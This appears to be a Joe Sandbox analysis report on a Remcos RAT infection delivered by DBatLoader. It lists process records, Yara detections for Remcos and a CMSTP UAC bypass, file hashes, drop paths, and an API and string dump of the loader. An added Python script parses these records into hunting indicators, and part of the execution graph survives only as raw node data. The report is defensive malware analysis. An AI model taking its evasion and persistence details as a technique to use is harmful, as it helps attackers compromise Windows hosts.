Target ID:4
Start time:17:04:00
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation:moderate
Has exited:false

Target ID:5
Start time:17:04:06
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:17:04:06
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:17:04:06
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:8
Start time:17:04:12
Start date:24/04/2024
Path:C:\Users\Public\Libraries\Wagotghl.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Wagotghl.PIF"
Imagebase:0xb70000
File size:1'646'592 bytes
MD5 hash:439F6DB2ADB770A0F825879C91DA9904
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 47%, ReversingLabs
Reputation:low
Has exited:true

Target ID:10
Start time:17:04:17
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:moderate
Has exited:true

Target ID:11
Start time:17:04:19
Start date:24/04/2024
Path:C:\Users\Public\Libraries\Wagotghl.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Wagotghl.PIF"
Imagebase:0x400000
File size:1'646'592 bytes
MD5 hash:439F6DB2ADB770A0F825879C91DA9904
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.1942171245.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:14
Start time:17:04:22
Start date:24/04/2024
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:moderate
Has exited:true
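As an added example (not part of the Joe Sandbox report and not Joe Sandbox's own code), the following Python parses process records in the "Key:value" form used above and turns the fields into hunting indicators: a .pif executable launched from C:\Users\Public\Libraries, the /stext output file in %TEMP% given to the child processes, a dropped PIF whose MD5 equals the submitted sample, and Yara hits that land in RWX memory. The field layout of the Yara "Source" dump name (target id, dump index, timestamp, base address, protection) is an assumption inferred from the values on this page (0000000A pairs with Target ID 10, 00000040 is PAGE_EXECUTE_READWRITE in winnt.h); the sample records are copied from the page and abridged to the fields the heuristics use.

```python
"""Parse Joe Sandbox process records and derive hunting indicators.
Added example: parser and heuristics are the editor's own, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Memory-protection constants from winnt.h, used to decode the dump name.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
PUBLIC_LIBS = r"c:\users\public\libraries"

# Constructed sample: three records copied from this report, abridged.
SAMPLE = r"""Target ID:6
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has administrator privileges:true

Target ID:8
Path:C:\Users\Public\Libraries\Wagotghl.PIF
Commandline:"C:\Users\Public\Libraries\Wagotghl.PIF"
MD5 hash:439F6DB2ADB770A0F825879C91DA9904
Has administrator privileges:false
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

Target ID:10
Path:C:\Users\Public\Libraries\lhgtogaW.pif
Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has administrator privileges:false
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
"""

YARA_RE = re.compile(r"Rule: (?P<rule>.+?), Description: (?P<desc>.+), Source: (?P<source>\S+), Author: (?P<author>.+)")
# Assumed dump-name layout: <target id>.<dump#>.<timestamp>.<base address>.<protection>.<...>.sdmp
SOURCE_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.", re.I)
STEXT_RE = re.compile(r'/stext\s+"?([^"]+)"?', re.I)


@dataclass
class ProcessRecord:
    fields: dict = field(default_factory=dict)   # scalar fields and non-Yara bullet lists
    yara: list = field(default_factory=list)     # parsed "• Rule: ..." entries


def parse_yara(item):
    m = YARA_RE.fullmatch(item)
    if not m:
        raise ValueError(f"unexpected Yara line: {item}")
    return m.groupdict()


def decode_source(source):
    """Decode a dump name into target id, base address and page protection (layout assumed, see above)."""
    m = SOURCE_RE.match(source)
    if not m:
        raise ValueError(f"unexpected dump name: {source}")
    prot = int(m.group(5), 16)
    return {"target": int(m.group(1), 16), "address": int(m.group(4), 16),
            "protection": PAGE_PROTECT.get(prot, f"{prot:#x}")}


def parse_records(text):
    """Split blank-line separated 'Key:value' blocks; '•' lines belong to the last key with an empty value."""
    records, cur, list_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur is not None:
                records.append(cur)
            cur = None
            continue
        if cur is None:
            cur = ProcessRecord()
        if line.startswith("•"):
            item = line.lstrip("• ").strip()
            if list_key == "Yara matches":
                cur.yara.append(parse_yara(item))
            else:
                cur.fields.setdefault(list_key, []).append(item)
            continue
        key, _, value = line.partition(":")      # split at the first colon only: values contain "C:\"
        key, value = key.strip(), value.strip()
        if value:
            cur.fields[key], list_key = value, None
        else:
            cur.fields.setdefault(key, [])
            list_key = key
    if cur is not None:
        records.append(cur)
    return records


def assess(rec, sample_md5=None):
    """Return the hunting indicators a record exhibits."""
    findings = []
    path, cmd = rec.fields.get("Path", ""), rec.fields.get("Commandline", "")
    target = int(rec.fields.get("Target ID", "-1"))
    if path.lower().startswith(PUBLIC_LIBS) and path.lower().endswith(".pif"):
        findings.append(f"PIF executable under {PUBLIC_LIBS}: {path}")
    m = STEXT_RE.search(cmd)
    if m:
        findings.append(f"/stext dump written to {m.group(1).strip()}")
    if sample_md5 and rec.fields.get("MD5 hash", "").lower() == sample_md5.lower():
        findings.append("byte-identical copy of the submitted sample")
    for y in rec.yara:
        d = decode_source(y["source"])
        if d["target"] != target:
            findings.append(f"{y['rule']}: dump belongs to target {d['target']}, not {target}")
        if d["protection"] == "PAGE_EXECUTE_READWRITE":
            findings.append(f"{y['rule']} hit in RWX region {d['address']:#x}")
    return findings


def analyse(text, sample_md5=None):
    return {r.fields["Target ID"]: assess(r, sample_md5) for r in parse_records(text)}


if __name__ == "__main__":
    for tid, findings in analyse(SAMPLE, "439f6db2adb770a0f825879c91da9904").items():
        print(f"Target ID {tid}: " + ("; ".join(findings) or "nothing flagged"))
```

The mismatch check in `assess` is the one to keep an eye on when reusing this on other reports: a Yara hit whose dump belongs to a different target id than the record it is listed under would indicate either a different dump-name layout than assumed here or a copy-paste error in the report, so the script reports it rather than silently trusting the decode.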


Execution Graph

Execution Coverage:16%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:26.2%
Total number of Nodes:390
Total number of Limit Nodes:21
execution_graph: the rendered graph survives only as a dump of numeric node ids and "a->b" edges, cut off at the end of the page, and cannot be reproduced as text. The information it carries is the set of API-labelled nodes, listed here by address:

Entry nodes: 28e4efe, 28c1c6c, 28e9b48, 28ea2f4
Collapsed subgraphs: 28c1644 (2 API calls), 28c2ce8 (7), 28c1a8c (8), 28c1724 (10), 28c2c2c / 28c2c44 / 28c44c4 / 28c44f4 / 28c4564 / 28c47b0 / 28c4824 (11 each), 28d7be8 (17)
28c64e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue
28c2ee0 QueryPerformanceCounter; 28c2ef8 GetTickCount
28c1684, 28c15cc, 28c15d4 VirtualAlloc
28c16f5, 28c1c00 VirtualFree
28c164f, 28c1668, 28c17cb, 28c17e4, 28c180a, 28c1820, 28c1947, 28c195d, 28c1b13, 28c1b2d, 28c1b4b, 28c1b61, 28c1d79, 28c1d91, 28c1e55, 28c1e6f Sleep
28dd603 InetIsOffline
28d7c05 LoadLibraryW GetModuleHandleW; 28d7c30 GetProcAddress
28d7b5b GetModuleHandleA GetProcAddress VirtualProtect
28e9b54 timeSetEvent
28ea33a GetMessageA; 28ea32e TranslateMessage DispatchMessageA
28c4270 SysAllocStringLen SysFreeString SysReAllocStringLen
28c4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA
28c4433 FreeLibrary; 28c4466 ExitProcess
28c4460 36366->36368 36368->36367 36370 28c4137 36369->36370 36371 28c4104 36369->36371 36370->36353 36371->36370 36373 28c15cc VirtualAlloc 36371->36373 36375 28c582c 36371->36375 36373->36371 36374->36364 36376 28c583c GetModuleFileNameA 36375->36376 36377 28c5858 36375->36377 36379 28c5a90 GetModuleFileNameA RegOpenKeyExA 36376->36379 36377->36371 36380 28c5b13 36379->36380 36381 28c5ad3 RegOpenKeyExA 36379->36381 36397 28c58cc 12 API calls 36380->36397 36381->36380 36382 28c5af1 RegOpenKeyExA 36381->36382 36382->36380 36384 28c5b9c lstrcpynA GetThreadLocale GetLocaleInfoA 36382->36384 36386 28c5cb6 36384->36386 36387 28c5bd3 36384->36387 36385 28c5b38 RegQueryValueExA 36388 28c5b58 RegQueryValueExA 36385->36388 36389 28c5b76 RegCloseKey 36385->36389 36386->36377 36387->36386 36390 28c5be3 lstrlenA 36387->36390 36388->36389 36389->36377 36392 28c5bfb 36390->36392 36392->36386 36393 28c5c48 36392->36393 36394 28c5c20 lstrcpynA LoadLibraryExA 36392->36394 36393->36386 36395 28c5c52 lstrcpynA LoadLibraryExA 36393->36395 36394->36393 36395->36386 36396 28c5c84 lstrcpynA LoadLibraryExA 36395->36396 36396->36386 36397->36385 36398 28c4c60 36399 28c4c64 36398->36399 36400 28c4c87 36398->36400 36401 28c4c24 36399->36401 36404 28c4c77 SysReAllocStringLen 36399->36404 36402 28c4c38 36401->36402 36403 28c4c2a SysFreeString 36401->36403 36403->36402 36404->36400 36405 28c4bf4 36404->36405 36406 28c4c10 36405->36406 36407 28c4c00 SysAllocStringLen 36405->36407 36407->36405 36407->36406 36408 28e1ac0 36409 28c4824 11 API calls 36408->36409 36410 28e1ae1 36409->36410 36411 28e1aec 36410->36411 36412 28e1af9 36411->36412 36413 28c47b0 11 API calls 36412->36413 36414 28e1b18 36413->36414 36415 28c4964 36414->36415 36416 28e1b23 36415->36416 36417 28c4698 36416->36417 36418 28e1b30 36417->36418 36419 28d7be8 17 API calls 36418->36419 36420 28e1b3c 36419->36420 36421 28c4824 11 API calls 36420->36421 36422 28e1b5d 36421->36422 36423 28e1b68 36422->36423 36424 28c47b0 11 API calls 
36423->36424 36425 28e1b94 36424->36425 36426 28c4964 36425->36426 36427 28e1b9f 36426->36427 36428 28c4698 36427->36428 36429 28e1bac 36428->36429 36430 28d7be8 17 API calls 36429->36430 36431 28e1bb8 36430->36431 36432 28c4824 11 API calls 36431->36432 36433 28e1c37 36432->36433 36434 28c4964 36433->36434 36435 28e1c42 36434->36435 36436 28e1c4e 36435->36436 36437 28c4824 11 API calls 36436->36437 36438 28e1c6f 36437->36438 36439 28c4964 36438->36439 36440 28e1c7a 36439->36440 36441 28c4698 36440->36441 36442 28e1c87 36441->36442 36443 28c47b0 11 API calls 36442->36443 36444 28e1ca6 36443->36444 36445 28c4964 36444->36445 36446 28e1cb1 36445->36446 36447 28d7be8 17 API calls 36446->36447 36448 28e1cca 36447->36448 36449 28c4824 11 API calls 36448->36449 36450 28e1ceb 36449->36450 36451 28c4698 36450->36451 36452 28e1d03 36451->36452 36453 28c47b0 11 API calls 36452->36453 36454 28e1d22 36453->36454 36455 28e1d3a 36454->36455 36456 28d7be8 17 API calls 36455->36456 36457 28e1d46 36456->36457 36458 28c4824 11 API calls 36457->36458 36459 28e1d67 36458->36459 36460 28e1d72 36459->36460 36461 28c4698 36460->36461 36462 28e1d7f 36461->36462 36463 28c47b0 11 API calls 36462->36463 36464 28e1d9e 36463->36464 36465 28c4964 36464->36465 36466 28e1da9 36465->36466 36467 28c4698 36466->36467 36468 28e1db6 36467->36468 36469 28d7be8 17 API calls 36468->36469 36470 28e1dc2 36469->36470 36471 28e1dd3 36470->36471 36472 28e1deb 36471->36472 37845 28c4728 36472->37845 37846 28c472e 37845->37846
                                                                                                                                                                    APIs
                                                                                                                                                                    • InetIsOffline.URL(00000000,00000000,028E8FB6,?,?,?,00000000,00000000), ref: 028DD604
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                      • Part of subcall function 028CC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029245F0,?,028DE40F,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession), ref: 028CC337
                                                                                                                                                                      • Part of subcall function 028DC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC517
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC547
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028DC55C
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028DC588
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028DC591
                                                                                                                                                                      • Part of subcall function 028C7E3C: GetFileAttributesA.KERNEL32(00000000,?,028E1133,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,ScanString), ref: 028C7E47
                                                                                                                                                                      • Part of subcall function 028C8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,028E1324,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,Initialize,02924344,028E8FEC,ScanString,02924344,028E8FEC), ref: 028C8011
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
• String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                    • API String ID: 2725267379-582383607
                                                                                                                                                                    • Opcode ID: c3dff70113703e84c8868c617e5d6c13f0c0e2c0cf1bbbeddeb5d4b06be40a06
                                                                                                                                                                    • Instruction ID: 961f426cb3c95cf57e504b04b2da44ebb027b19c6c2a38344f7b58d298def372
                                                                                                                                                                    • Opcode Fuzzy Hash: c3dff70113703e84c8868c617e5d6c13f0c0e2c0cf1bbbeddeb5d4b06be40a06
                                                                                                                                                                    • Instruction Fuzzy Hash: C804EA3CA141689FDF60EB68D890EDD73B6AF95301F2044A9A109E7714DB70EE89CF52
